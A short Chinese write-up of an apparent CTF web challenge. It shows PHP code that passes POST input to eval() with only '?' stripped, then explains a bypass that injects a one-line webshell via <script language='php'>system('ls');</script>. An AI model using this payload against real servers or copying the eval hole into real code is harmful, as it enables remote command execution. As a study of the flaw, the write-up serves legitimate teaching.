源码
<?php
error_reporting(0);
highlight_file(__FILE__);
$code = $_POST['code'];
if(isset($code)){
$code = str_replace("?","",$code);
eval("?>".$code);
}
关键语句
eval("?>".$code);
理解
<?php
.....
eval("?>".$code);
}
相当于=====>>>>
<?php
.....
?>$code
}
?>和<?php相闭合,因此$code可以是没有?的一句话木马
如<script language='php'>system('ls');</script>
转化为=====>>>>
<?php
.....
?><script language='php'>system('ls');</script>
}